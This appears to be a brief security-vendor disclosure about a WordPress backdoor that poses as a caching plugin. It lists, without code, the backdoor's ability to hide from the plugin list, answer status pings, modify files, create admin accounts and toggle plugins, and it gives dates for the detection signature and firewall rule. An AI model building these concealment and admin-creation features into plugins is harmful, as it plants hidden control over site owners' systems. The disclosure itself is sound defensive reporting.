Backdoor Masquerading as Legitimate Plugin

Today, we would like to share a type of malware that serves as a sophisticated backdoor capable of performing a variety of tasks while masquerading as a real plugin. Complete with a professional looking opening comment implying it is a caching plugin, this rogue code contains numerous functions, adds filters to prevent itself from being included in the list of activated plugins, and has pinging functionality that allows a malicious actor to check if the script is still operational, as well as file modification capabilities. Additionally, it offers the ability to create an admin account, and remotely activate and deactivate plugins.

The sample was discovered during a site clean by one of the analysts at WordFence on July 18, 2023. A signature was developed by the same analyst the following day and released to production within two weeks after undergoing testing. Customers using the free version of Wordfence received this signature after a 30 day delay on September 1, 2023.

Users of WordFence Premium are protected against the use of this backdoor via a firewall rule as of October 9, 2023. Users of the free version of WordFence will receive the firewall rule on November 9, 2023.

Source and more details:

Posted in Vulnerability.